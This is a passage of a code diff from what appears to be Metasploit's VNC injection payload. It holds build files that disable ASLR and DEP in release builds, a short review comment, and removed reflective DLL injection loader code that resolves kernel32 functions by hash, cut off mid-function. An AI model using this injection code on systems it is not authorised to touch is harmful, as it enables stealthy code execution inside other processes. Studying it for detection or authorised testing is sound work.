<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<LinkIncremental>true</LinkIncremental>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<LinkIncremental>true</LinkIncremental>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<LinkIncremental>false</LinkIncremental>
|
||||||
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
|
||||||
|
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<LinkIncremental>false</LinkIncremental>
|
||||||
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
</PropertyGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<PreprocessorDefinitions>WIN32;WIN_X86;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<MinimalRebuild>true</MinimalRebuild>
|
||||||
|
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
|
||||||
|
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<TargetMachine>MachineX86</TargetMachine>
|
||||||
|
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
</Link>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
</ResourceCompile>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<Midl>
|
||||||
|
<TargetEnvironment>X64</TargetEnvironment>
|
||||||
|
</Midl>
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>Disabled</Optimization>
|
||||||
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<MinimalRebuild>true</MinimalRebuild>
|
||||||
|
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
|
||||||
|
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<TargetMachine>MachineX64</TargetMachine>
|
||||||
|
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
</Link>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>_X64_;_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
</ResourceCompile>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
exit 0</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>MaxSpeed</Optimization>
|
||||||
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
|
<PreprocessorDefinitions>WIN32;WIN_X86;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
<CompileAs>CompileAsC</CompileAs>
|
||||||
|
</ClCompile>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
</ResourceCompile>
|
||||||
|
<Link>
|
||||||
|
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
|
||||||
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
|
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||||
|
<DataExecutionPrevention>false</DataExecutionPrevention>
|
||||||
|
<TargetMachine>MachineX86</TargetMachine>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<Midl>
|
||||||
|
<TargetEnvironment>X64</TargetEnvironment>
|
||||||
|
</Midl>
|
||||||
|
<ClCompile>
|
||||||
|
<Optimization>MaxSpeed</Optimization>
|
||||||
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<PrecompiledHeader />
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
<CompileAs>CompileAsC</CompileAs>
|
||||||
|
</ClCompile>
|
||||||
|
<ResourceCompile>
|
||||||
|
<PreprocessorDefinitions>_X64_;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
</ResourceCompile>
|
||||||
|
<Link>
|
||||||
|
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
|
||||||
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
|
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||||
|
<DataExecutionPrevention>false</DataExecutionPrevention>
|
||||||
|
<TargetMachine>MachineX64</TargetMachine>
|
||||||
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClCompile Include="..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" />
|
||||||
|
<ClCompile Include="context.c" />
|
||||||
|
<ClCompile Include="loader.c" />
|
||||||
|
<ClCompile Include="inject.c" />
|
||||||
|
<ClCompile Include="ps.c" />
|
||||||
|
<ClCompile Include="session.c" />
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClInclude Include="context.h" />
|
||||||
|
<ClInclude Include="loader.h" />
|
||||||
|
<ClInclude Include="inject.h" />
|
||||||
|
<ClInclude Include="ps.h" />
|
||||||
|
<ClInclude Include="session.h" />
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ResourceCompile Include="loader.rc" />
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ProjectReference Include="..\winvnc\WinVNC.vcxproj">
|
||||||
|
<Project>{ea6a09ac-04bb-423d-8842-ca48df901058}</Project>
|
||||||
|
<ReferenceOutputAssembly>false</ReferenceOutputAssembly>
|
||||||
|
</ProjectReference>
|
||||||
|
</ItemGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||||
|
<ImportGroup Label="ExtensionTargets">
|
||||||
|
</ImportGroup>
|
||||||
|
</Project>
|
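Review bot: Both Release configurations set `<RandomizedBaseAddress>false</RandomizedBaseAddress>` and `<DataExecutionPrevention>false</DataExecutionPrevention>`, while the Debug configurations leave the linker defaults, so the two build flavours produce DLLs with different image characteristics. If this is deliberate because the reflective loader performs its own relocation, a comment beside those elements saying so would stop the next maintainer from "fixing" it; otherwise dropping the two elements keeps the defaults and aligns the configurations. The Debug post-build events also end in `exit 0`, which masks an editbin failure, whereas the Release events do not.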
|
@ -0,0 +1,65 @@
|
||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<ItemGroup>
|
||||||
|
<Filter Include="Source Files">
|
||||||
|
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||||
|
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Source Files\core">
|
||||||
|
<UniqueIdentifier>{7c56685d-83b5-4541-b5dd-a620ffe19b23}</UniqueIdentifier>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Header Files">
|
||||||
|
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||||
|
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Header Files\core">
|
||||||
|
<UniqueIdentifier>{6b6dd5ba-1f40-449f-a55b-7180bb0793a0}</UniqueIdentifier>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Resource Files">
|
||||||
|
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||||
|
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav</Extensions>
|
||||||
|
</Filter>
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClCompile Include="context.c">
|
||||||
|
<Filter>Source Files</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="loader.c">
|
||||||
|
<Filter>Source Files</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="inject.c">
|
||||||
|
<Filter>Source Files\core</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="ps.c">
|
||||||
|
<Filter>Source Files\core</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="session.c">
|
||||||
|
<Filter>Source Files\core</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
<ClCompile Include="..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c">
|
||||||
|
<Filter>Source Files\core</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClInclude Include="context.h">
|
||||||
|
<Filter>Header Files</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="loader.h">
|
||||||
|
<Filter>Header Files</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="inject.h">
|
||||||
|
<Filter>Header Files\core</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="ps.h">
|
||||||
|
<Filter>Header Files\core</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="session.h">
|
||||||
|
<Filter>Header Files\core</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ResourceCompile Include="loader.rc">
|
||||||
|
<Filter>Resource Files</Filter>
|
||||||
|
</ResourceCompile>
|
||||||
|
</ItemGroup>
|
||||||
|
</Project>
|
|
@ -1,53 +0,0 @@
|
||||||
//===============================================================================================//
|
|
||||||
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
|
|
||||||
// All rights reserved.
|
|
||||||
//
|
|
||||||
// Redistribution and use in source and binary forms, with or without modification, are permitted
|
|
||||||
// provided that the following conditions are met:
|
|
||||||
//
|
|
||||||
// * Redistributions of source code must retain the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer.
|
|
||||||
//
|
|
||||||
// * Redistributions in binary form must reproduce the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer in the documentation and/or other materials provided
|
|
||||||
// with the distribution.
|
|
||||||
//
|
|
||||||
// * Neither the name of Harmony Security nor the names of its contributors may be used to
|
|
||||||
// endorse or promote products derived from this software without specific prior written permission.
|
|
||||||
//
|
|
||||||
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
|
|
||||||
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
|
|
||||||
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
|
|
||||||
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
|
||||||
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
|
||||||
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
|
|
||||||
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
// POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
//===============================================================================================//
|
|
||||||
#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
|
|
||||||
#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
|
|
||||||
//===============================================================================================//
|
|
||||||
#define WIN32_LEAN_AND_MEAN
|
|
||||||
#include <windows.h>
|
|
||||||
|
|
||||||
// we declare some common stuff in here...
|
|
||||||
|
|
||||||
#define DLL_METASPLOIT_ATTACH 4
|
|
||||||
#define DLL_METASPLOIT_DETACH 5
|
|
||||||
#define DLL_QUERY_HMODULE 6
|
|
||||||
|
|
||||||
#define DEREF( name )*(UINT_PTR *)(name)
|
|
||||||
#define DEREF_64( name )*(DWORD64 *)(name)
|
|
||||||
#define DEREF_32( name )*(DWORD *)(name)
|
|
||||||
#define DEREF_16( name )*(WORD *)(name)
|
|
||||||
#define DEREF_8( name )*(BYTE *)(name)
|
|
||||||
|
|
||||||
typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
|
|
||||||
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
|
|
||||||
|
|
||||||
#define DLLEXPORT __declspec( dllexport )
|
|
||||||
|
|
||||||
//===============================================================================================//
|
|
||||||
#endif
|
|
||||||
//===============================================================================================//
|
|
|
@ -1,457 +0,0 @@
|
||||||
//===============================================================================================//
|
|
||||||
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
|
|
||||||
// All rights reserved.
|
|
||||||
//
|
|
||||||
// Redistribution and use in source and binary forms, with or without modification, are permitted
|
|
||||||
// provided that the following conditions are met:
|
|
||||||
//
|
|
||||||
// * Redistributions of source code must retain the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer.
|
|
||||||
//
|
|
||||||
// * Redistributions in binary form must reproduce the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer in the documentation and/or other materials provided
|
|
||||||
// with the distribution.
|
|
||||||
//
|
|
||||||
// * Neither the name of Harmony Security nor the names of its contributors may be used to
|
|
||||||
// endorse or promote products derived from this software without specific prior written permission.
|
|
||||||
//
|
|
||||||
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
|
|
||||||
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
|
|
||||||
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
|
|
||||||
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
|
||||||
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
|
||||||
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
|
|
||||||
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
// POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
//===============================================================================================//
|
|
||||||
#include "ReflectiveLoader.h"
|
|
||||||
//===============================================================================================//
|
|
||||||
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
|
|
||||||
HINSTANCE hAppInstance = NULL;
|
|
||||||
//===============================================================================================//
|
|
||||||
#ifdef _WIN64
|
|
||||||
#pragma intrinsic( _ReturnAddress )
|
|
||||||
UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
|
|
||||||
#endif
|
|
||||||
//===============================================================================================//
|
|
||||||
|
|
||||||
/*
|
|
||||||
* Use Reflective DLL Injection.
|
|
||||||
*/
|
|
||||||
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
|
||||||
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
|
||||||
|
|
||||||
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
|
|
||||||
// otherwise the DllMain at the end of this file will be used.
|
|
||||||
|
|
||||||
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
|
|
||||||
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
|
|
||||||
|
|
||||||
// This is our position independent reflective DLL loader/injector
|
|
||||||
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
|
||||||
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
|
|
||||||
#else
|
|
||||||
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
|
|
||||||
#endif
|
|
||||||
{
|
|
||||||
// the functions we need
|
|
||||||
LOADLIBRARYA pLoadLibraryA;
|
|
||||||
GETPROCADDRESS pGetProcAddress;
|
|
||||||
VIRTUALALLOC pVirtualAlloc;
|
|
||||||
USHORT usCounter;
|
|
||||||
|
|
||||||
// the initial location of this image in memory
|
|
||||||
UINT_PTR uiLibraryAddress;
|
|
||||||
// the kernels base address and later this images newly loaded base address
|
|
||||||
UINT_PTR uiBaseAddress;
|
|
||||||
|
|
||||||
// variables for processing the kernels export table
|
|
||||||
UINT_PTR uiAddressArray;
|
|
||||||
UINT_PTR uiNameArray;
|
|
||||||
UINT_PTR uiExportDir;
|
|
||||||
UINT_PTR uiNameOrdinals;
|
|
||||||
DWORD dwHashValue;
|
|
||||||
|
|
||||||
// variables for loading this image
|
|
||||||
UINT_PTR uiHeaderValue;
|
|
||||||
UINT_PTR uiValueA;
|
|
||||||
UINT_PTR uiValueB;
|
|
||||||
UINT_PTR uiValueC;
|
|
||||||
UINT_PTR uiValueD;
|
|
||||||
|
|
||||||
// STEP 0: calculate our images current base address
|
|
||||||
|
|
||||||
// we will start searching backwards from our current EIP
|
|
||||||
#ifdef _WIN64
|
|
||||||
uiLibraryAddress = eip();
|
|
||||||
#else
|
|
||||||
__asm call geteip
|
|
||||||
__asm geteip: pop uiLibraryAddress
|
|
||||||
#endif
|
|
||||||
|
|
||||||
// loop through memory backwards searching for our images base address
|
|
||||||
// we dont need SEH style search as we shouldnt generate any access violations with this
|
|
||||||
while( TRUE )
|
|
||||||
{
|
|
||||||
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
|
|
||||||
{
|
|
||||||
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
|
|
||||||
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
|
|
||||||
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
|
|
||||||
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
|
|
||||||
{
|
|
||||||
uiHeaderValue += uiLibraryAddress;
|
|
||||||
// break if we have found a valid MZ/PE header
|
|
||||||
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
uiLibraryAddress--;
|
|
||||||
}
|
|
||||||
|
|
||||||
// STEP 1: process the kernels exports for the functions our loader needs...
|
|
||||||
|
|
||||||
// get the Process Enviroment Block
|
|
||||||
#ifdef _WIN64
|
|
||||||
uiBaseAddress = __readgsqword( 0x60 );
|
|
||||||
#else
|
|
||||||
uiBaseAddress = __readfsdword( 0x30 );
|
|
||||||
#endif
|
|
||||||
|
|
||||||
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
|
|
||||||
uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr;
|
|
||||||
|
|
||||||
// get the first entry of the InMemoryOrder module list
|
|
||||||
uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
|
|
||||||
while( uiValueA )
|
|
||||||
{
|
|
||||||
// get pointer to current modules name (unicode string)
|
|
||||||
uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
|
|
||||||
// set bCounter to the length for the loop
|
|
||||||
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
|
|
||||||
// clear uiValueC which will store the hash of the module name
|
|
||||||
uiValueC = 0;
|
|
||||||
// compute the hash of the module name...
|
|
||||||
do
|
|
||||||
{
|
|
||||||
uiValueC = ror( (DWORD)uiValueC );
|
|
||||||
// normalize to uppercase if the madule name is in lowercase
|
|
||||||
if( *((BYTE *)uiValueB) >= 'a' )
|
|
||||||
uiValueC += *((BYTE *)uiValueB) - 0x20;
|
|
||||||
else
|
|
||||||
uiValueC += *((BYTE *)uiValueB);
|
|
||||||
uiValueB++;
|
|
||||||
} while( --usCounter );
|
|
||||||
// compare the hash with that of kernel32.dll
|
|
||||||
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
|
|
||||||
{
|
|
||||||
// get this modules base address
|
|
||||||
uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
// get the next entry
|
|
||||||
uiValueA = DEREF( uiValueA );
|
|
||||||
}
|
|
||||||
|
|
||||||
// get the VA of the modules NT Header
|
|
||||||
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
|
|
||||||
|
|
||||||
// uiNameArray = the address of the modules export directory entry
|
|
||||||
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
|
|
||||||
|
|
||||||
// get the VA of the export directory
|
|
||||||
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
|
|
||||||
|
|
||||||
// get the VA for the array of name pointers
|
|
||||||
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
|
|
||||||
|
|
||||||
// get the VA for the array of name ordinals
|
|
||||||
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
|
|
||||||
|
|
||||||
usCounter = 3;
|
|
||||||
|
|
||||||
// loop while we still have imports to find
|
|
||||||
while( usCounter > 0 )
|
|
||||||
{
|
|
||||||
// compute the hash values for this function name
|
|
||||||
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
|
|
||||||
|
|
||||||
// if we have found a function we want we get its virtual address
|
|
||||||
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
|
|
||||||
{
|
|
||||||
// get the VA for the array of addresses
|
|
||||||
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
|
|
||||||
|
|
||||||
// use this functions name ordinal as an index into the array of name pointers
|
|
||||||
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
|
|
||||||
|
|
||||||
// store this functions VA
|
|
||||||
if( dwHashValue == LOADLIBRARYA_HASH )
|
|
||||||
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
|
|
||||||
else if( dwHashValue == GETPROCADDRESS_HASH )
|
|
||||||
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
|
|
||||||
else if( dwHashValue == VIRTUALALLOC_HASH )
|
|
||||||
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
|
|
||||||
|
|
||||||
// decrement our counter
|
|
||||||
usCounter--;
|
|
||||||
}
|
|
||||||
|
|
||||||
// get the next exported function name
|
|
||||||
uiNameArray += sizeof(DWORD);
|
|
||||||
|
|
||||||
// get the next exported function name ordinal
|
|
||||||
uiNameOrdinals += sizeof(WORD);
|
|
||||||
}
|
|
||||||
|
